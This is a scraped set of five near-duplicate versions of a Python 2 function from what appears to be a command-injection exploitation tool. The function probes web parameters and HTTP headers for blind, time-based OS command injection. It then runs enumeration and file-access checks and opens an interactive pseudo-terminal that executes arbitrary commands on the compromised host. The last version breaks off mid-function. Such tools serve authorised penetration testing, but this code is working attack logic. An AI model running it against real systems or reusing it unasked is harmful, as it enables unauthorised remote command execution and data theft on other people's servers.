Example #1
0
def tfb_injection_handler(url, delay, filename, tmp_path, http_request_method):

    counter = 0
    vp_flag = True
    no_result = True
    is_encoded = False
    fixation = False
    export_injection_info = False
    injection_type = "Semiblind-based Command Injection"
    technique = "tempfile-based injection technique"

    # Check if defined "--maxlen" option.
    if menu.options.maxlen:
        maxlen = menu.options.maxlen

    # Check if defined "--url-reload" option.
    if menu.options.url_reload == True:
        print Back.RED + "(x) Error: The '--url-reload' option is not available in " + technique + "!" + Style.RESET_ALL

    num_of_chars = 0
    # Calculate all possible combinations
    total = len(settings.SEPARATORS)

    # Estimating the response time (in seconds)
    request = urllib2.Request(url)
    headers.do_check(request)
    start = time.time()
    response = urllib2.urlopen(request)
    response.read(1)
    response.close()
    end = time.time()
    diff = end - start
    url_time_response = int(diff)
    if url_time_response != 0:
        print Style.BRIGHT + "(!) The estimated response time is " + str(url_time_response) + " second" + "s"[
            url_time_response == 1 :
        ] + "." + Style.RESET_ALL
    delay = int(delay) + int(url_time_response)

    for separator in settings.SEPARATORS:
        num_of_chars = num_of_chars + 1

        # Change TAG on every request to prevent false-positive resutls.
        TAG = "".join(random.choice(string.ascii_uppercase) for num_of_chars in range(6))

        # The output file for file-based injection technique.
        OUTPUT_TEXTFILE = tmp_path + TAG + ".txt"
        alter_shell = menu.options.alter_shell
        tag_length = len(TAG) + 4

        for output_length in range(1, int(tag_length)):
            try:

                # Tempfile-based decision payload (check if host is vulnerable).
                if alter_shell:

                    payload = tfb_payloads.decision_alter_shell(
                        separator, output_length, TAG, OUTPUT_TEXTFILE, delay, http_request_method
                    )

                else:
                    payload = tfb_payloads.decision(
                        separator, output_length, TAG, OUTPUT_TEXTFILE, delay, http_request_method
                    )

                # Check if defined "--verbose" option.
                if menu.options.verbose:
                    if separator == ";" or separator == "&&" or separator == "||":
                        sys.stdout.write("\n" + Fore.GREY + payload.replace("\n", "\\n") + Style.RESET_ALL)

                # Check if target host is vulnerable
                how_long, vuln_parameter = tfb_injector.injection_test(payload, http_request_method, url)
                if not menu.options.verbose:
                    percent = (num_of_chars * 100) / total
                    if how_long >= delay:
                        percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL
                    elif percent == 100:
                        if no_result == True:
                            percent = Fore.RED + "FAILED" + Style.RESET_ALL
                        else:
                            percent = str(percent) + "%"
                    else:
                        percent = str(percent) + "%"
                    sys.stdout.write("\r(*) Testing the " + technique + "... " + "[ " + percent + " ]")
                    sys.stdout.flush()

            except KeyboardInterrupt:
                raise

            except:
                if not menu.options.verbose:
                    percent = (num_of_chars * 100) / total

                    if percent == 100:
                        if no_result == True:
                            percent = Fore.RED + "FAILED" + Style.RESET_ALL
                            sys.stdout.write("\r(*) Testing the " + technique + "... " + "[ " + percent + " ]")
                            sys.stdout.flush()
                            break
                        else:
                            percent = str(percent) + "%"
                        raise
                    else:
                        percent = str(percent) + "%"
                break

            # Yaw, got shellz!
            # Do some magic tricks!
            if how_long >= delay:

                found = True
                no_result = False

                # Print the findings to log file.
                if export_injection_info == False:
                    output_file = open(filename + ".txt", "a")
                    output_file.write("\n(+) Type : " + injection_type)
                    output_file.write("\n(+) Technique : " + technique.title())
                    output_file.close()
                    export_injection_info = True

                if http_request_method == "GET":
                    # Print the findings to log file
                    if vp_flag == True:
                        output_file = open(filename + ".txt", "a")
                        output_file.write("\n(+) Parameter : " + vuln_parameter + " (" + http_request_method + ")")
                        output_file.write("\n")
                        vp_flag = False
                        output_file.close()

                    counter = counter + 1
                    output_file = open(filename + ".txt", "a")
                    output_file.write("  (" + str(counter) + ") Payload : " + re.sub("%20", " ", payload) + "\n")
                    output_file.close()

                    # Vulnerabe Parameter
                    GET_vuln_param = parameters.vuln_GET_param(url)

                    # Print the findings to terminal.
                    print Style.BRIGHT + "\n(!) The (" + http_request_method + ") '" + Style.UNDERLINE + GET_vuln_param + Style.RESET_ALL + Style.BRIGHT + "' parameter is vulnerable to " + injection_type + "." + Style.RESET_ALL
                    print "  (+) Type : " + Fore.YELLOW + Style.BRIGHT + injection_type + Style.RESET_ALL + ""
                    print "  (+) Technique : " + Fore.YELLOW + Style.BRIGHT + technique.title() + Style.RESET_ALL + ""
                    print "  (+) Payload : " + Fore.YELLOW + Style.BRIGHT + re.sub(
                        "%20", " ", urllib.unquote_plus(payload.replace("\n", "\\n"))
                    ) + Style.RESET_ALL

                else:
                    # Print the findings to log file
                    if vp_flag == True:
                        output_file = open(filename + ".txt", "a")
                        output_file.write("\n(+) Parameter : " + vuln_parameter + " (" + http_request_method + ")")
                        output_file.write("\n")
                        vp_flag = False
                        output_file.close()

                    counter = counter + 1
                    output_file = open(filename + ".txt", "a")
                    output_file.write("  (" + str(counter) + ") Payload : " + re.sub("%20", " ", payload) + "\n")
                    output_file.close()

                    # Vulnerabe Parameter
                    POST_vuln_param = vuln_parameter

                    # Print the findings to terminal.
                    print Style.BRIGHT + "\n(!) The (" + http_request_method + ") '" + Style.UNDERLINE + POST_vuln_param + Style.RESET_ALL + Style.BRIGHT + "' parameter is vulnerable to " + injection_type + "." + Style.RESET_ALL
                    print "  (+) Type : " + Fore.YELLOW + Style.BRIGHT + injection_type + Style.RESET_ALL + ""
                    print "  (+) Technique : " + Fore.YELLOW + Style.BRIGHT + technique.title() + Style.RESET_ALL + ""
                    print "  (+) Payload : " + Fore.YELLOW + Style.BRIGHT + re.sub(
                        "%20", " ", payload.replace("\n", "\\n")
                    ) + Style.RESET_ALL

                # Check for any enumeration options.
                tfb_enumeration.do_check(
                    separator,
                    maxlen,
                    TAG,
                    delay,
                    http_request_method,
                    url,
                    vuln_parameter,
                    OUTPUT_TEXTFILE,
                    alter_shell,
                )

                # Check for any enumeration options.
                tfb_file_access.do_check(
                    separator,
                    maxlen,
                    TAG,
                    delay,
                    http_request_method,
                    url,
                    vuln_parameter,
                    OUTPUT_TEXTFILE,
                    alter_shell,
                )

                # Pseudo-Terminal shell
                while True:
                    gotshell = raw_input("\n(*) Do you want a Pseudo-Terminal shell? [Y/n] > ").lower()
                    if gotshell in settings.CHOISE_YES:
                        print ""
                        print "Pseudo-Terminal (type 'q' or use <Ctrl-C> to quit)"
                        while True:
                            try:
                                cmd = raw_input("Shell > ")
                                if cmd == "q":
                                    sys.exit(0)

                                else:
                                    # The main command injection exploitation.
                                    check_how_long, output = tfb_injector.injection(
                                        separator,
                                        maxlen,
                                        TAG,
                                        cmd,
                                        delay,
                                        http_request_method,
                                        url,
                                        vuln_parameter,
                                        OUTPUT_TEXTFILE,
                                        alter_shell,
                                    )

                                    if menu.options.verbose:
                                        print ""
                                    if output != "" and check_how_long != 0:
                                        print "\n\n" + Fore.GREEN + Style.BRIGHT + output + Style.RESET_ALL
                                        print "\n(*) Finished in " + time.strftime(
                                            "%H:%M:%S", time.gmtime(check_how_long)
                                        ) + ".\n"
                                    else:
                                        print ""

                            except KeyboardInterrupt:
                                print ""
                                sys.exit(0)

                    elif gotshell in settings.CHOISE_NO:
                        break
                        if menu.options.verbose:
                            sys.stdout.write("\r(*) Continue testing the " + technique + "... ")
                            sys.stdout.flush()

                    else:
                        if gotshell == "":
                            gotshell = "enter"
                        print Back.RED + "(x) Error: '" + gotshell + "' is not a valid answer." + Style.RESET_ALL
                        pass

                break

    if no_result == True:
        if menu.options.verbose == False:
            print ""
            return False
        else:
            print ""
            return False
    else:
        sys.stdout.write("\r")
        sys.stdout.flush()
Example #2
0
def tfb_injection_handler(url, delay, filename, tmp_path, http_request_method):
  
  counter = 1
  vp_flag = True
  no_result = True
  is_encoded = False
  fixation = False
  export_injection_info = False
  injection_type = "Semiblind-based Command Injection"
  technique = "tempfile-based injection technique"
  
  # Check if defined "--maxlen" option.
  if menu.options.maxlen:
    maxlen = menu.options.maxlen
    
  # Check if defined "--url-reload" option.
  if menu.options.url_reload == True:
    print Back.RED + "(x) Error: The '--url-reload' option is not available in "+ technique +"!" + Style.RESET_ALL
  
  num_of_chars = 0
  # Calculate all possible combinations
  total = len(settings.SEPARATORS)
  
  # Estimating the response time (in seconds)
  request = urllib2.Request(url)
  headers.do_check(request)
  start = time.time()
  response = urllib2.urlopen(request)
  response.read(1)
  response.close()
  end = time.time()
  diff = end - start
  url_time_response = int(diff)
  if url_time_response != 0 :
    print Style.BRIGHT + "(!) The estimated response time is " + str(url_time_response) + " second" + "s"[url_time_response == 1:] + "." + Style.RESET_ALL
  delay = int(delay) + int(url_time_response)
  
  for separator in settings.SEPARATORS:
    num_of_chars = num_of_chars + 1
          
    # Change TAG on every request to prevent false-positive resutls.
    TAG = ''.join(random.choice(string.ascii_uppercase) for num_of_chars in range(6))  

    # The output file for file-based injection technique.
    OUTPUT_TEXTFILE = tmp_path + TAG + ".txt"
    alter_shell = menu.options.alter_shell
    tag_length = len(TAG) + 4
    
    for output_length in range(1, int(tag_length)):
      try:

        # Tempfile-based decision payload (check if host is vulnerable).
        if alter_shell :
          payload = tfb_payloads.decision_alter_shell(separator, output_length, TAG, OUTPUT_TEXTFILE, delay, http_request_method)
        else:
          payload = tfb_payloads.decision(separator, output_length, TAG, OUTPUT_TEXTFILE, delay, http_request_method)

        # Check if defined "--verbose" option.
        if menu.options.verbose:
          if separator == ";" or separator == "&&" or separator == "||":
            sys.stdout.write("\n" + Fore.GREY + payload.replace("\n", "\\n") + Style.RESET_ALL)
            
        # Cookie Injection
        if settings.COOKIE_INJECTION == True:
          # Check if target host is vulnerable to cookie injection.
          vuln_parameter = parameters.specify_cookie_parameter(menu.options.cookie)
          how_long = tfb_injector.cookie_injection_test(url, vuln_parameter, payload)
        else:
          # Check if target host is vulnerable.
          how_long, vuln_parameter = tfb_injector.injection_test(payload, http_request_method, url)

        if not menu.options.verbose:
          percent = ((num_of_chars*100)/total)
          if how_long >= delay:
            percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL
          elif percent == 100:
            if no_result == True:
              percent = Fore.RED + "FAILED" + Style.RESET_ALL
            else:
                percent = str(percent)+"%"
          else:
            percent = str(percent)+"%"
          sys.stdout.write("\r(*) Testing the "+ technique + "... " +  "[ " + percent + " ]")  
          sys.stdout.flush()
          
      except KeyboardInterrupt: 
        raise
      
      except:
        if not menu.options.verbose:
          percent = ((num_of_chars*100)/total)
          
          if percent == 100:
            if no_result == True:
              percent = Fore.RED + "FAILED" + Style.RESET_ALL
              sys.stdout.write("\r(*) Testing the "+ technique + "... " +  "[ " + percent + " ]")  
              sys.stdout.flush()
              break
            else:
              percent = str(percent)+"%"
            raise
          else:
            percent = str(percent)+"%"
        break
      
      # Yaw, got shellz! 
      # Do some magic tricks!
      if how_long >= delay:

        found = True
        no_result = False
        
        if settings.COOKIE_INJECTION == True: 
          http_request_method = "cookie"
          found_vuln_parameter = vuln_parameter
        else:
          if http_request_method == "GET":
            found_vuln_parameter = parameters.vuln_GET_param(url)
          else :
            found_vuln_parameter = vuln_parameter

        # Print the findings to log file.
        if export_injection_info == False:
          export_injection_info = logs.add_type_and_technique(export_injection_info, filename, injection_type, technique)
        if vp_flag == True:
          vp_flag = logs.add_parameter(vp_flag, filename, http_request_method, vuln_parameter, payload)
        logs.upload_payload(filename, counter, payload) 
        counter = counter + 1
        
        # Print the findings to terminal.
        print Style.BRIGHT + "\n(!) The ("+ http_request_method + ") '" + Style.UNDERLINE + found_vuln_parameter + Style.RESET_ALL + Style.BRIGHT + "' parameter is vulnerable to "+ injection_type +"."+ Style.RESET_ALL
        print "  (+) Type : "+ Fore.YELLOW + Style.BRIGHT + injection_type + Style.RESET_ALL + ""
        print "  (+) Technique : "+ Fore.YELLOW + Style.BRIGHT + technique.title() + Style.RESET_ALL + ""
        print "  (+) Payload : "+ Fore.YELLOW + Style.BRIGHT + re.sub("%20", " ", payload.replace("\n", "\\n")) + Style.RESET_ALL
        
        # Check for any enumeration options.
        tfb_enumeration.do_check(separator, maxlen, TAG, delay, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell)

        # Check for any enumeration options.
        tfb_file_access.do_check(separator, maxlen, TAG, delay, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell)
        
        # Pseudo-Terminal shell
        while True:
          gotshell = raw_input("\n(?) Do you want a Pseudo-Terminal shell? [Y/n] > ").lower()
          if gotshell in settings.CHOISE_YES:
            print ""
            print "Pseudo-Terminal (type 'q' or use <Ctrl-C> to quit)"
            while True:
              try:
                cmd = raw_input("Shell > ")
                if cmd == "q":
                  sys.exit(0)
                  
                else:
                  # The main command injection exploitation.
                  # Cookie Injection
                  check_how_long, output  = tfb_injector.injection(separator, maxlen, TAG, cmd, delay, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell)

                  if menu.options.verbose:
                    print ""
                  if output != "" and check_how_long != 0 :
                    print "\n\n" + Fore.GREEN + Style.BRIGHT + output + Style.RESET_ALL
                    print "\n(*) Finished in "+ time.strftime('%H:%M:%S', time.gmtime(check_how_long)) +".\n"
                  else:
                    print ""
                  
              except KeyboardInterrupt: 
                print ""
                sys.exit(0)
                
          elif gotshell in settings.CHOISE_NO:
            break
            if menu.options.verbose:
              sys.stdout.write("\r(*) Continue testing the "+ technique +"... ")
              sys.stdout.flush()
          
          else:
            if gotshell == "":
              gotshell = "enter"
            print Back.RED + "(x) Error: '" + gotshell + "' is not a valid answer." + Style.RESET_ALL
            pass
          
        break
    
  if no_result == True:
    if menu.options.verbose == False:
      print ""
      return False
    else:
      print ""
      return False
  else :
    sys.stdout.write("\r")
    sys.stdout.flush()
Example #3
0
def tfb_injection_handler(url, delay, filename, tmp_path, http_request_method, url_time_response):
  
  counter = 1
  num_of_chars = 1
  vp_flag = True
  no_result = True
  is_encoded = False
  export_injection_info = False
  
  injection_type = "Semiblind-based Command Injection"
  technique = "tempfile-based injection technique"
  
  # Check if defined "--maxlen" option.
  if menu.options.maxlen:
    maxlen = menu.options.maxlen
    
  # Check if defined "--url-reload" option.
  if menu.options.url_reload == True:
    print Back.RED + "(x) Error: The '--url-reload' option is not available in "+ technique +"!" + Style.RESET_ALL
  
  # Calculate all possible combinations
  total = (len(settings.PREFIXES) * len(settings.SEPARATORS) * len(settings.SUFFIXES) - len(settings.JUNK_COMBINATION))
    
  for prefix in settings.PREFIXES:
    for suffix in settings.SUFFIXES:
      for separator in settings.SEPARATORS:
        num_of_chars = num_of_chars + 1

        # Check for bad combination of prefix and separator
        combination = prefix + separator
        if combination in settings.JUNK_COMBINATION:
          prefix = ""

        # Change TAG on every request to prevent false-positive resutls.
        TAG = ''.join(random.choice(string.ascii_uppercase) for num_of_chars in range(6))  

        # The output file for file-based injection technique.
        OUTPUT_TEXTFILE = tmp_path + TAG + ".txt"
        alter_shell = menu.options.alter_shell
        tag_length = len(TAG) + 4
        
        for output_length in range(1, int(tag_length)):
          try:

            # Tempfile-based decision payload (check if host is vulnerable).
            if alter_shell :
              payload = tfb_payloads.decision_alter_shell(separator, output_length, TAG, OUTPUT_TEXTFILE, delay, http_request_method)
            else:
              payload = tfb_payloads.decision(separator, output_length, TAG, OUTPUT_TEXTFILE, delay, http_request_method)

            # Fix prefixes / suffixes
            payload = parameters.prefixes(payload, prefix)
            payload = parameters.suffixes(payload, suffix)
              
            # Check if defined "--verbose" option.
            if menu.options.verbose:
              if separator == ";" or separator == "&&" or separator == "||":
                print Fore.GREY + "(~) Payload: " + payload.replace("\n", "\\n") + Style.RESET_ALL
                
            # Cookie Injection
            if settings.COOKIE_INJECTION == True:
              # Check if target host is vulnerable to cookie injection.
              vuln_parameter = parameters.specify_cookie_parameter(menu.options.cookie)
              how_long = tfb_injector.cookie_injection_test(url, vuln_parameter, payload)
              
            # User-Agent Injection
            elif settings.USER_AGENT_INJECTION == True:
              # Check if target host is vulnerable to user-agent injection.
              vuln_parameter = parameters.specify_user_agent_parameter(menu.options.agent)
              how_long = tfb_injector.user_agent_injection_test(url, vuln_parameter, payload)

            # Referer Injection
            elif settings.REFERER_INJECTION == True:
              # Check if target host is vulnerable to referer injection.
              vuln_parameter = parameters.specify_referer_parameter(menu.options.referer)
              how_long = tfb_injector.referer_injection_test(url, vuln_parameter, payload)

            else:
              # Check if target host is vulnerable.
              how_long, vuln_parameter = tfb_injector.injection_test(payload, http_request_method, url)

            # Injection percentage calculation
            percent = ((num_of_chars * 100) / total)

            if percent == 100 and no_result == True:
              if not menu.options.verbose:
                percent = Fore.RED + "FAILED" + Style.RESET_ALL
              else:
                percent = ""
            else:
              if (url_time_response <= 1 and how_long >= delay) or \
              (url_time_response >= 2 and how_long > delay):

                # Time relative false positive fixation.
                randv1 = random.randrange(0, 1)
                randv2 = random.randrange(1, 2)
                randvcalc = randv1 + randv2

                cmd = "echo $((" + str(randv1) + "+" + str(randv2) + "))"
                output  = tfb_injector.false_positive_check(separator, TAG, cmd, prefix, suffix, delay, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, randvcalc, alter_shell)
                if str(output) == str(randvcalc):
                  if not menu.options.verbose:
                    percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL
                  else:
                    percent = ""
                else:
                  break
                    
              else:
                percent = str(percent)+"%"
                
            if not menu.options.verbose:
              sys.stdout.write("\r(*) Testing the "+ technique + "... " +  "[ " + percent + " ]")  
              sys.stdout.flush()
              
          except KeyboardInterrupt: 
            raise
          
          except:
            percent = ((num_of_chars * 100) / total)
            if percent == 100:
              if no_result == True:
                if not menu.options.verbose:
                  percent = Fore.RED + "FAILED" + Style.RESET_ALL
                  sys.stdout.write("\r(*) Testing the "+ technique + "... " +  "[ " + percent + " ]")  
                  sys.stdout.flush()
                else:
                  percent = ""
                break
              else:
                percent = str(percent)+"%"
              #Print logs notification message
              percent = Fore.BLUE + "FINISHED" + Style.RESET_ALL
              sys.stdout.write("\r(*) Testing the "+ technique + "... " +  "[ " + percent + " ]")  
              sys.stdout.flush()
              print ""
              logs.logs_notification(filename)
              raise
            else:
              percent = str(percent)+"%"
            break
          
          # Yaw, got shellz! 
          # Do some magic tricks!
          if (url_time_response <= 1 and how_long >= delay) or \
          (url_time_response >= 2 and how_long > delay) :

            if len(TAG) == output_length:
              found = True
              no_result = False
              
              if settings.COOKIE_INJECTION == True: 
                header_name = " Cookie"
                found_vuln_parameter = vuln_parameter
                the_type = " HTTP header"

              elif settings.USER_AGENT_INJECTION == True: 
                header_name = " User-Agent"
                found_vuln_parameter = ""
                the_type = " HTTP header"

              elif settings.REFERER_INJECTION == True: 
                header_name = " Referer"
                found_vuln_parameter = ""
                the_type = " HTTP header"

              else:
                header_name = ""
                the_type = " parameter"
                if http_request_method == "GET":
                  found_vuln_parameter = parameters.vuln_GET_param(url)
                else :
                  found_vuln_parameter = vuln_parameter

              if len(found_vuln_parameter) != 0 :
                found_vuln_parameter = " '" + Style.UNDERLINE + found_vuln_parameter + Style.RESET_ALL  + Style.BRIGHT + "'" 

              # Print the findings to log file.
              if export_injection_info == False:
                export_injection_info = logs.add_type_and_technique(export_injection_info, filename, injection_type, technique)
              if vp_flag == True:
                vp_flag = logs.add_parameter(vp_flag, filename, http_request_method, vuln_parameter, payload)
              logs.upload_payload(filename, counter, payload) 
              counter = counter + 1
              
              # Print the findings to terminal.
              print Style.BRIGHT + "\n(!) The ("+ http_request_method + ")" + found_vuln_parameter + header_name + the_type + " is vulnerable to "+ injection_type + "." + Style.RESET_ALL
              print "  (+) Type : "+ Fore.YELLOW + Style.BRIGHT + injection_type + Style.RESET_ALL + ""
              print "  (+) Technique : "+ Fore.YELLOW + Style.BRIGHT + technique.title() + Style.RESET_ALL + ""
              print "  (+) Payload : "+ Fore.YELLOW + Style.BRIGHT + re.sub("%20", " ", payload.replace("\n", "\\n")) + Style.RESET_ALL
              
              # Check for any enumeration options.
              tfb_enumeration.do_check(separator, maxlen, TAG, prefix, suffix, delay, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell)

              # Check for any enumeration options.
              tfb_file_access.do_check(separator, maxlen, TAG, prefix, suffix, delay, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell)
              
              # Check if defined single cmd.
              if menu.options.os_cmd:
                tfb_enumeration.single_os_cmd_exec(separator, maxlen, TAG, cmd, prefix, suffix, delay, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell)

              # Pseudo-Terminal shell
              go_back = False
              while True:
                if go_back == True:
                  break
                gotshell = raw_input("\n(?) Do you want a Pseudo-Terminal shell? [Y/n] > ").lower()
                if gotshell in settings.CHOISE_YES:
                  print ""
                  print "Pseudo-Terminal (type '?' for shell options)"
                  while True:
                    try:
                      cmd = raw_input("Shell > ")
                      if cmd.lower() in settings.SHELL_OPTIONS:
                        if cmd == "?":
                          menu.shell_options()
                          continue
                        elif cmd.lower() == "quit":
                          logs.logs_notification(filename)
                          sys.exit(0)
                        elif cmd.lower() == "back":
                          go_back = True
                          break
                        else:
                          pass
                        
                      else:
                        # The main command injection exploitation.
                        check_how_long, output  = tfb_injector.injection(separator, maxlen, TAG, cmd, prefix, suffix, delay, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell)

                        if menu.options.verbose:
                          print ""
                          
                        if output != "" and check_how_long != 0 :
                          print "\n\n" + Fore.GREEN + Style.BRIGHT + output + Style.RESET_ALL
                          print "\n(*) Finished in "+ time.strftime('%H:%M:%S', time.gmtime(check_how_long)) +".\n"
                        else:
                          print "\n" + Back.RED + "(x) Error: The '" + cmd + "' command, does not return any output." + Style.RESET_ALL + "\n"
                        
                    except KeyboardInterrupt: 
                      raise
                      
                elif gotshell in settings.CHOISE_NO:
                  break
                  if menu.options.verbose:
                    sys.stdout.write("\r(*) Continue testing the "+ technique +"... ")
                    sys.stdout.flush()
                
                else:
                  if gotshell == "":
                    gotshell = "enter"
                  print Back.RED + "(x) Error: '" + gotshell + "' is not a valid answer." + Style.RESET_ALL
                  pass
                  
            break
    
  if no_result == True:
    print ""
    return False

  else :
    sys.stdout.write("\r")
    sys.stdout.flush()
Example #4
0
def tfb_injection_handler(url, delay, filename, tmp_path, http_request_method, url_time_response):
  counter = 1
  vp_flag = True
  no_result = True
  is_encoded = False
  fixation = False
  export_injection_info = False
  
  injection_type = "Semiblind-based Command Injection"
  technique = "tempfile-based injection technique"
  
  # Check if defined "--maxlen" option.
  if menu.options.maxlen:
    maxlen = menu.options.maxlen
    
  # Check if defined "--url-reload" option.
  if menu.options.url_reload == True:
    print Back.RED + "(x) Error: The '--url-reload' option is not available in "+ technique +"!" + Style.RESET_ALL
  
  num_of_chars = 0

  # Calculate all possible combinations
  total = len(settings.SEPARATORS)
    
  for separator in settings.SEPARATORS:
    num_of_chars = num_of_chars + 1
          
    # Change TAG on every request to prevent false-positive resutls.
    TAG = ''.join(random.choice(string.ascii_uppercase) for num_of_chars in range(6))  

    # The output file for file-based injection technique.
    OUTPUT_TEXTFILE = tmp_path + TAG + ".txt"
    alter_shell = menu.options.alter_shell
    tag_length = len(TAG) + 4
    
    for output_length in range(1, int(tag_length)):
      try:

        # Tempfile-based decision payload (check if host is vulnerable).
        if alter_shell :
          payload = tfb_payloads.decision_alter_shell(separator, output_length, TAG, OUTPUT_TEXTFILE, delay, http_request_method)
        else:
          payload = tfb_payloads.decision(separator, output_length, TAG, OUTPUT_TEXTFILE, delay, http_request_method)

        # Check if defined "--verbose" option.
        if menu.options.verbose:
          if separator == ";" or separator == "&&" or separator == "||":
            print Fore.GREY + payload.replace("\n", "\\n") + Style.RESET_ALL
            
        # Cookie Injection
        if settings.COOKIE_INJECTION == True:
          # Check if target host is vulnerable to cookie injection.
          vuln_parameter = parameters.specify_cookie_parameter(menu.options.cookie)
          how_long = tfb_injector.cookie_injection_test(url, vuln_parameter, payload)
          
        else:
          # Check if target host is vulnerable.
          how_long, vuln_parameter = tfb_injector.injection_test(payload, http_request_method, url)

        percent = ((num_of_chars * 100) / total)

        if percent == 100 and no_result == True:
          if not menu.options.verbose:
            percent = Fore.RED + "FAILED" + Style.RESET_ALL
          else:
            percent = ""
        else:
          if (url_time_response <= 1 and how_long >= delay) or \
          (url_time_response >= 2 and how_long > delay):

            # Time relative false positive fixation.
            if len(TAG) == output_length :
              if fixation == True:
                delay = delay + 1
            else:
              fixation = True
              continue

            randv1 = random.randrange(0, 1)
            randv2 = random.randrange(1, 2)
            randvcalc = randv1 + randv2

            cmd = "echo $((" + str(randv1) + "+" + str(randv2) + "))"
            output  = tfb_injector.false_positive_check(separator, TAG, cmd, delay, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, randvcalc, alter_shell)
            if str(output) == str(randvcalc):
              if not menu.options.verbose:
                percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL
              else:
                percent = ""
          else:
            percent = str(percent)+"%"
            
        if not menu.options.verbose:
          sys.stdout.write("\r(*) Testing the "+ technique + "... " +  "[ " + percent + " ]")  
          sys.stdout.flush()
          
      except KeyboardInterrupt: 
        raise
      
      except:
        percent = ((num_of_chars * 100) / total)
        if percent == 100:
          if no_result == True:
            if not menu.options.verbose:
              percent = Fore.RED + "FAILED" + Style.RESET_ALL
              sys.stdout.write("\r(*) Testing the "+ technique + "... " +  "[ " + percent + " ]")  
              sys.stdout.flush()
            else:
              percent = ""
            break
          else:
            percent = str(percent)+"%"
          raise
        else:
          percent = str(percent)+"%"
        break
      
      # Yaw, got shellz! 
      # Do some magic tricks!
      if ((url_time_response <= 1 and how_long >= delay) or \
      (url_time_response >= 2 and how_long > delay)) and len(TAG) == output_length:

        found = True
        no_result = False
        
        if settings.COOKIE_INJECTION == True: 
          http_request_method = "cookie"
          found_vuln_parameter = vuln_parameter
        else:
          if http_request_method == "GET":
            found_vuln_parameter = parameters.vuln_GET_param(url)
          else :
            found_vuln_parameter = vuln_parameter

        # Print the findings to log file.
        if export_injection_info == False:
          export_injection_info = logs.add_type_and_technique(export_injection_info, filename, injection_type, technique)
        if vp_flag == True:
          vp_flag = logs.add_parameter(vp_flag, filename, http_request_method, vuln_parameter, payload)
        logs.upload_payload(filename, counter, payload) 
        counter = counter + 1
        
        # Print the findings to terminal.
        print Style.BRIGHT + "\n(!) The ("+ http_request_method + ") '" + Style.UNDERLINE + found_vuln_parameter + Style.RESET_ALL + Style.BRIGHT + "' parameter is vulnerable to "+ injection_type +"."+ Style.RESET_ALL
        print "  (+) Type : "+ Fore.YELLOW + Style.BRIGHT + injection_type + Style.RESET_ALL + ""
        print "  (+) Technique : "+ Fore.YELLOW + Style.BRIGHT + technique.title() + Style.RESET_ALL + ""
        print "  (+) Payload : "+ Fore.YELLOW + Style.BRIGHT + re.sub("%20", " ", payload.replace("\n", "\\n")) + Style.RESET_ALL
        
        # Check for any enumeration options.
        tfb_enumeration.do_check(separator, maxlen, TAG, delay, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell)

        # Check for any enumeration options.
        tfb_file_access.do_check(separator, maxlen, TAG, delay, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell)
        
        # Pseudo-Terminal shell
        while True:
          gotshell = raw_input("\n(?) Do you want a Pseudo-Terminal shell? [Y/n] > ").lower()
          if gotshell in settings.CHOISE_YES:
            print ""
            print "Pseudo-Terminal (type 'q' or use <Ctrl-C> to quit)"
            while True:
              try:
                cmd = raw_input("Shell > ")
                if cmd == "q":
                  sys.exit(0)
                  
                else:
                  # The main command injection exploitation.
                  # Cookie Injection
                  check_how_long, output  = tfb_injector.injection(separator, maxlen, TAG, cmd, delay, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell)

                  if menu.options.verbose:
                    print ""
                  if output != "" and check_how_long != 0 :
                    print "\n\n" + Fore.GREEN + Style.BRIGHT + output + Style.RESET_ALL
                    print "\n(*) Finished in "+ time.strftime('%H:%M:%S', time.gmtime(check_how_long)) +".\n"
                  else:
                    print ""
                  
              except KeyboardInterrupt: 
                print ""
                sys.exit(0)
                
          elif gotshell in settings.CHOISE_NO:
            break
            if menu.options.verbose:
              sys.stdout.write("\r(*) Continue testing the "+ technique +"... ")
              sys.stdout.flush()
          
          else:
            if gotshell == "":
              gotshell = "enter"
            print Back.RED + "(x) Error: '" + gotshell + "' is not a valid answer." + Style.RESET_ALL
            pass
          
        break
    
  if no_result == True:
    if menu.options.verbose == False:
      print ""
      return False
    else:
      print ""
      return False
  else :
    sys.stdout.write("\r")
    sys.stdout.flush()
Example #5
0
def tfb_injection_handler(url, delay, filename, tmp_path, http_request_method, url_time_response):
  
  counter = 1
  num_of_chars = 1
  vp_flag = True
  no_result = True
  is_encoded = False
  export_injection_info = False
  
  injection_type = "Semiblind-based Command Injection"
  technique = "tempfile-based injection technique"
  
  # Check if defined "--maxlen" option.
  if menu.options.maxlen:
    maxlen = menu.options.maxlen
    
  # Check if defined "--url-reload" option.
  if menu.options.url_reload == True:
    print Back.RED + "(x) Error: The '--url-reload' option is not available in "+ technique +"!" + Style.RESET_ALL
  
  # Calculate all possible combinations
  total = (len(settings.PREFIXES) * len(settings.SEPARATORS) * len(settings.SUFFIXES) - len(settings.JUNK_COMBINATION))
    
  for prefix in settings.PREFIXES:
    for suffix in settings.SUFFIXES:
      for separator in settings.SEPARATORS:
        num_of_chars = num_of_chars + 1

        # Check for bad combination of prefix and separator
        combination = prefix + separator
        if combination in settings.JUNK_COMBINATION:
          prefix = ""

        # Change TAG on every request to prevent false-positive resutls.
        TAG = ''.join(random.choice(string.ascii_uppercase) for num_of_chars in range(6))  

        # The output file for file-based injection technique.
        OUTPUT_TEXTFILE = tmp_path + TAG + ".txt"
        alter_shell = menu.options.alter_shell
        tag_length = len(TAG) + 4
        
        for output_length in range(1, int(tag_length)):
          try:

            # Tempfile-based decision payload (check if host is vulnerable).
            if alter_shell :
              payload = tfb_payloads.decision_alter_shell(separator, output_length, TAG, OUTPUT_TEXTFILE, delay, http_request_method)
            else:
